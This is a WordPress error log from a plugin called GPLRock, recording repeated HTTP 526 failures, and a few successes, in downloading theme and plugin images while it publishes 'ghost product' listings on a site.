[05-Apr-2026 17:29:37 UTC] GPLRock WARNING: Image download failed for product arkai-modern-multipurpose-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/arkai---modern--multipurpose-wordpress-blog-theme-26916.webp [05-Apr-2026 17:29:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: arkai-modern-multipurpose-wordpress-blog-theme [05-Apr-2026 17:29:37 UTC] GPLRock: Image download failed for product akko-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:39 UTC] GPLRock: Image download failed for product akko-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/akko---portfolio-wordpress-theme-11693.webp for product akko-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:29:42 UTC] GPLRock: Image download failed for product akko-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:44 UTC] GPLRock: Image download failed for product akko-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/akko---portfolio-wordpress-theme-11693.webp for product akko-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:29:46 UTC] GPLRock WARNING: Image download failed for product akko-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/akko---portfolio-wordpress-theme-11693.webp [05-Apr-2026 17:29:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: akko-portfolio-wordpress-theme [05-Apr-2026 17:29:46 UTC] GPLRock: Image download failed for product elegence-beauty-and-cosmetics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:48 UTC] GPLRock: Image download failed for product elegence-beauty-and-cosmetics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elegence---beauty-and-cosmetics-wordpress-theme-11275.webp for product elegence-beauty-and-cosmetics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:29:50 UTC] GPLRock: Image download failed for product elegence-beauty-and-cosmetics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:52 UTC] GPLRock: Image download failed for product elegence-beauty-and-cosmetics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elegence---beauty-and-cosmetics-wordpress-theme-11275.webp for product elegence-beauty-and-cosmetics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:29:55 UTC] GPLRock WARNING: Image download failed for product elegence-beauty-and-cosmetics-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/elegence---beauty-and-cosmetics-wordpress-theme-11275.webp [05-Apr-2026 17:29:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elegence-beauty-and-cosmetics-wordpress-theme [05-Apr-2026 17:29:55 UTC] GPLRock: Image download failed for product socify-marketplace-community-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:57 UTC] GPLRock: Image download failed for product socify-marketplace-community-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/socify---marketplace--community-wordpress-theme-25684.webp for product socify-marketplace-community-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:29:59 UTC] GPLRock: Image download failed for product socify-marketplace-community-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:30:01 UTC] GPLRock: Image download failed for product socify-marketplace-community-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:30:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/socify---marketplace--community-wordpress-theme-25684.webp for product socify-marketplace-community-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:30:03 UTC] GPLRock WARNING: Image download failed for product socify-marketplace-community-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/socify---marketplace--community-wordpress-theme-25684.webp [05-Apr-2026 17:30:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: socify-marketplace-community-wordpress-theme [05-Apr-2026 17:30:04 UTC] GPLRock: Image downloaded successfully for product shopvolly-wp-multipurpose-elementor-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-45446290.webp [05-Apr-2026 17:30:04 UTC] GPLRock: Using pre-downloaded image for product shopvolly-wp-multipurpose-elementor-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-45446290.webp [05-Apr-2026 17:30:04 UTC] GPLRock: Ghost product published with image - Product ID: shopvolly-wp-multipurpose-elementor-woocommerce-theme [05-Apr-2026 17:30:04 UTC] GPLRock: Image download failed for product megashop-woocommerce-multipurpose-theme-for-electronics-marketplaces (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:30:06 UTC] GPLRock: Image download failed for product megashop-woocommerce-multipurpose-theme-for-electronics-marketplaces (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:30:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/megashop---woocommerce-multipurpose-theme-for-electronics-marketplaces-26854.webp for product megashop-woocommerce-multipurpose-theme-for-electronics-marketplaces after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:30:08 UTC] GPLRock: Image download failed for product megashop-woocommerce-multipurpose-theme-for-electronics-marketplaces (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:30:10 UTC] GPLRock: Image download failed for product megashop-woocommerce-multipurpose-theme-for-electronics-marketplaces (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:30:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/megashop---woocommerce-multipurpose-theme-for-electronics-marketplaces-26854.webp for product megashop-woocommerce-multipurpose-theme-for-electronics-marketplaces after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:30:13 UTC] GPLRock WARNING: Image download failed for product megashop-woocommerce-multipurpose-theme-for-electronics-marketplaces. URL: https://meldwp.com/wp-content/uploads/megashop---woocommerce-multipurpose-theme-for-electronics-marketplaces-26854.webp [05-Apr-2026 17:30:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: megashop-woocommerce-multipurpose-theme-for-electronics-marketplaces [05-Apr-2026 17:30:34 UTC] GPLRock: Image download failed for product unicase-electronics-store-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:30:36 UTC] GPLRock: Image download failed for product unicase-electronics-store-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:30:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/unicase---electronics-store-woocommerce-theme-29208.webp for product unicase-electronics-store-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:30:38 UTC] GPLRock: Image download failed for product unicase-electronics-store-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:30:40 UTC] GPLRock: Image download failed for product unicase-electronics-store-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:30:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/unicase---electronics-store-woocommerce-theme-29208.webp for product unicase-electronics-store-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:30:42 UTC] GPLRock WARNING: Image download failed for product unicase-electronics-store-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/unicase---electronics-store-woocommerce-theme-29208.webp [05-Apr-2026 17:30:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: unicase-electronics-store-woocommerce-theme [05-Apr-2026 17:30:43 UTC] GPLRock: Image download failed for product good-mood-wine-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:30:45 UTC] GPLRock: Image download failed for product good-mood-wine-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:30:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/good-mood---wine-shop-wordpress-theme-11103.webp for product good-mood-wine-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:30:47 UTC] GPLRock: Image download failed for product good-mood-wine-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:30:49 UTC] GPLRock: Image download failed for product good-mood-wine-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:30:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/good-mood---wine-shop-wordpress-theme-11103.webp for product good-mood-wine-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:30:51 UTC] GPLRock WARNING: Image download failed for product good-mood-wine-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/good-mood---wine-shop-wordpress-theme-11103.webp [05-Apr-2026 17:30:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: good-mood-wine-shop-wordpress-theme [05-Apr-2026 17:30:51 UTC] GPLRock: Image download failed for product cartana-building-and-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:30:53 UTC] GPLRock: Image download failed for product cartana-building-and-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:30:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cartana---building-and-construction-wordpress-theme-4018.webp for product cartana-building-and-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:30:56 UTC] GPLRock: Image download failed for product cartana-building-and-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:30:58 UTC] GPLRock: Image download failed for product cartana-building-and-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cartana---building-and-construction-wordpress-theme-4018.webp for product cartana-building-and-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:31:00 UTC] GPLRock WARNING: Image download failed for product cartana-building-and-construction-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cartana---building-and-construction-wordpress-theme-4018.webp [05-Apr-2026 17:31:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cartana-building-and-construction-wordpress-theme [05-Apr-2026 17:31:00 UTC] GPLRock: Image download failed for product charitable-charity-nonprofit-organization-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:02 UTC] GPLRock: Image download failed for product charitable-charity-nonprofit-organization-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/charitable---charity-nonprofit-organization-wordpress-theme-14060.webp for product charitable-charity-nonprofit-organization-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:31:04 UTC] GPLRock: Image download failed for product charitable-charity-nonprofit-organization-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:06 UTC] GPLRock: Image download failed for product charitable-charity-nonprofit-organization-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/charitable---charity-nonprofit-organization-wordpress-theme-14060.webp for product charitable-charity-nonprofit-organization-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:31:08 UTC] GPLRock WARNING: Image download failed for product charitable-charity-nonprofit-organization-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/charitable---charity-nonprofit-organization-wordpress-theme-14060.webp [05-Apr-2026 17:31:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: charitable-charity-nonprofit-organization-wordpress-theme [05-Apr-2026 17:31:09 UTC] GPLRock: Image download failed for product scrate-education-and-teaching-online-courses-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:11 UTC] GPLRock: Image download failed for product scrate-education-and-teaching-online-courses-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/scrate---education-and-teaching-online-courses-wordpress-theme-5364.webp for product scrate-education-and-teaching-online-courses-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:31:13 UTC] GPLRock: Image download failed for product scrate-education-and-teaching-online-courses-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:15 UTC] GPLRock: Image download failed for product scrate-education-and-teaching-online-courses-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/scrate---education-and-teaching-online-courses-wordpress-theme-5364.webp for product scrate-education-and-teaching-online-courses-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:31:17 UTC] GPLRock WARNING: Image download failed for product scrate-education-and-teaching-online-courses-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/scrate---education-and-teaching-online-courses-wordpress-theme-5364.webp [05-Apr-2026 17:31:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: scrate-education-and-teaching-online-courses-wordpress-theme [05-Apr-2026 17:31:17 UTC] GPLRock: Image download failed for product incanto-minimal-stylish-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:19 UTC] GPLRock: Image download failed for product incanto-minimal-stylish-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/incanto---minimal--stylish-wp-theme-542.webp for product incanto-minimal-stylish-wp-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:31:22 UTC] GPLRock: Image download failed for product incanto-minimal-stylish-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:24 UTC] GPLRock: Image download failed for product incanto-minimal-stylish-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/incanto---minimal--stylish-wp-theme-542.webp for product incanto-minimal-stylish-wp-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:31:26 UTC] GPLRock WARNING: Image download failed for product incanto-minimal-stylish-wp-theme. URL: https://meldwp.com/wp-content/uploads/incanto---minimal--stylish-wp-theme-542.webp [05-Apr-2026 17:31:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: incanto-minimal-stylish-wp-theme [05-Apr-2026 17:31:26 UTC] GPLRock: Image download failed for product lavan-fashion-model-agency-wordpress-cms-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:28 UTC] GPLRock: Image download failed for product lavan-fashion-model-agency-wordpress-cms-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lavan---fashion-model-agency-wordpress-cms-theme-29923.webp for product lavan-fashion-model-agency-wordpress-cms-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:31:30 UTC] GPLRock: Image download failed for product lavan-fashion-model-agency-wordpress-cms-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:32 UTC] GPLRock: Image download failed for product lavan-fashion-model-agency-wordpress-cms-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lavan---fashion-model-agency-wordpress-cms-theme-29923.webp for product lavan-fashion-model-agency-wordpress-cms-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:31:34 UTC] GPLRock WARNING: Image download failed for product lavan-fashion-model-agency-wordpress-cms-theme. URL: https://meldwp.com/wp-content/uploads/lavan---fashion-model-agency-wordpress-cms-theme-29923.webp [05-Apr-2026 17:31:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lavan-fashion-model-agency-wordpress-cms-theme [05-Apr-2026 17:31:35 UTC] GPLRock: Image download failed for product ai-zenius-ai-writer-copywriting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:37 UTC] GPLRock: Image download failed for product ai-zenius-ai-writer-copywriting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ai-zenius---ai-writer--copywriting-wordpress-theme-6036.webp for product ai-zenius-ai-writer-copywriting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:31:39 UTC] GPLRock: Image download failed for product ai-zenius-ai-writer-copywriting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:41 UTC] GPLRock: Image download failed for product ai-zenius-ai-writer-copywriting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ai-zenius---ai-writer--copywriting-wordpress-theme-6036.webp for product ai-zenius-ai-writer-copywriting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:31:43 UTC] GPLRock WARNING: Image download failed for product ai-zenius-ai-writer-copywriting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ai-zenius---ai-writer--copywriting-wordpress-theme-6036.webp [05-Apr-2026 17:31:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ai-zenius-ai-writer-copywriting-wordpress-theme [05-Apr-2026 17:31:43 UTC] GPLRock: Image download failed for product dashcode-react-vuejs-nextjs-laravel-htmltailwind-dashboard-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:46 UTC] GPLRock: Image download failed for product dashcode-react-vuejs-nextjs-laravel-htmltailwind-dashboard-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dashcode---react-vuejs-nextjs-laravel-htmltailwind-dashboard-template-30621.webp for product dashcode-react-vuejs-nextjs-laravel-htmltailwind-dashboard-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:31:48 UTC] GPLRock: Image download failed for product dashcode-react-vuejs-nextjs-laravel-htmltailwind-dashboard-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:50 UTC] GPLRock: Image download failed for product dashcode-react-vuejs-nextjs-laravel-htmltailwind-dashboard-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dashcode---react-vuejs-nextjs-laravel-htmltailwind-dashboard-template-30621.webp for product dashcode-react-vuejs-nextjs-laravel-htmltailwind-dashboard-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:31:52 UTC] GPLRock WARNING: Image download failed for product dashcode-react-vuejs-nextjs-laravel-htmltailwind-dashboard-template. URL: https://meldwp.com/wp-content/uploads/dashcode---react-vuejs-nextjs-laravel-htmltailwind-dashboard-template-30621.webp [05-Apr-2026 17:31:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dashcode-react-vuejs-nextjs-laravel-htmltailwind-dashboard-template [05-Apr-2026 17:31:53 UTC] GPLRock: Image download failed for product techmax-it-solutions-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:55 UTC] GPLRock: Image download failed for product techmax-it-solutions-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/techmax---it-solutions--technology-wordpress-theme-26500.webp for product techmax-it-solutions-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:31:57 UTC] GPLRock: Image download failed for product techmax-it-solutions-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:31:59 UTC] GPLRock: Image download failed for product techmax-it-solutions-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:32:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/techmax---it-solutions--technology-wordpress-theme-26500.webp for product techmax-it-solutions-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:32:01 UTC] GPLRock WARNING: Image download failed for product techmax-it-solutions-technology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/techmax---it-solutions--technology-wordpress-theme-26500.webp [05-Apr-2026 17:32:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: techmax-it-solutions-technology-wordpress-theme [05-Apr-2026 17:34:28 UTC] GPLRock: Image downloaded successfully for product gamipress-reports (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-416d6b58.webp [05-Apr-2026 17:34:28 UTC] GPLRock: Using pre-downloaded image for product gamipress-reports: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-416d6b58.webp [05-Apr-2026 17:34:28 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-reports [05-Apr-2026 17:34:29 UTC] GPLRock: Image downloaded successfully for product gamipress-mark-as-completed (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-187ae64e.jpg [05-Apr-2026 17:34:29 UTC] GPLRock: Using pre-downloaded image for product gamipress-mark-as-completed: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-187ae64e.jpg [05-Apr-2026 17:34:29 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-mark-as-completed [05-Apr-2026 17:34:31 UTC] GPLRock: Image downloaded successfully for product gamipress-woocommerce-discounts (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-21f23b1f.jpg [05-Apr-2026 17:34:31 UTC] GPLRock: Using pre-downloaded image for product gamipress-woocommerce-discounts: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-21f23b1f.jpg [05-Apr-2026 17:34:31 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-woocommerce-discounts [05-Apr-2026 17:34:32 UTC] GPLRock: Image downloaded successfully for product gamipress-points-exchanges (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-44439673.jpg [05-Apr-2026 17:34:33 UTC] GPLRock: Using pre-downloaded image for product gamipress-points-exchanges: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-44439673.jpg [05-Apr-2026 17:34:33 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-points-exchanges [05-Apr-2026 17:34:34 UTC] GPLRock: Image downloaded successfully for product gamipress-zapier (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0ad06a3d.jpg [05-Apr-2026 17:34:34 UTC] GPLRock: Using pre-downloaded image for product gamipress-zapier: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0ad06a3d.jpg [05-Apr-2026 17:34:34 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-zapier [05-Apr-2026 17:34:35 UTC] GPLRock: Image downloaded successfully for product gamipress-time-based-rewards (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e29beeb2.jpg [05-Apr-2026 17:34:36 UTC] GPLRock: Using pre-downloaded image for product gamipress-time-based-rewards: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e29beeb2.jpg [05-Apr-2026 17:34:36 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-time-based-rewards [05-Apr-2026 17:44:41 UTC] GPLRock: Image download failed for product shopfront-next-generation-ecommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:44:43 UTC] GPLRock: Image download failed for product shopfront-next-generation-ecommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:44:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shopfront---next-generation-ecommerce-theme-3052.webp for product shopfront-next-generation-ecommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:44:45 UTC] GPLRock: Image download failed for product shopfront-next-generation-ecommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:44:47 UTC] GPLRock: Image download failed for product shopfront-next-generation-ecommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:44:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shopfront---next-generation-ecommerce-theme-3052.webp for product shopfront-next-generation-ecommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:44:49 UTC] GPLRock WARNING: Image download failed for product shopfront-next-generation-ecommerce-theme. URL: https://meldwp.com/wp-content/uploads/shopfront---next-generation-ecommerce-theme-3052.webp [05-Apr-2026 17:44:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: shopfront-next-generation-ecommerce-theme [05-Apr-2026 17:44:49 UTC] GPLRock: Image download failed for product manufacto-factory-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:44:51 UTC] GPLRock: Image download failed for product manufacto-factory-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:44:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/manufacto---factory-wordpress-theme-26884.webp for product manufacto-factory-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:44:54 UTC] GPLRock: Image download failed for product manufacto-factory-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:44:56 UTC] GPLRock: Image download failed for product manufacto-factory-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:44:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/manufacto---factory-wordpress-theme-26884.webp for product manufacto-factory-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:44:58 UTC] GPLRock WARNING: Image download failed for product manufacto-factory-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/manufacto---factory-wordpress-theme-26884.webp [05-Apr-2026 17:44:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: manufacto-factory-wordpress-theme [05-Apr-2026 17:44:58 UTC] GPLRock: Image download failed for product cavalier-we-sell-the-trends-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:00 UTC] GPLRock: Image download failed for product cavalier-we-sell-the-trends-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cavalier---we-sell-the-trends-woocommerce-theme-1922.webp for product cavalier-we-sell-the-trends-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:45:03 UTC] GPLRock: Image download failed for product cavalier-we-sell-the-trends-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:05 UTC] GPLRock: Image download failed for product cavalier-we-sell-the-trends-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cavalier---we-sell-the-trends-woocommerce-theme-1922.webp for product cavalier-we-sell-the-trends-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:45:07 UTC] GPLRock WARNING: Image download failed for product cavalier-we-sell-the-trends-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/cavalier---we-sell-the-trends-woocommerce-theme-1922.webp [05-Apr-2026 17:45:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cavalier-we-sell-the-trends-woocommerce-theme [05-Apr-2026 17:45:07 UTC] GPLRock: Image download failed for product hoppex-real-estate-and-architect-group-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . 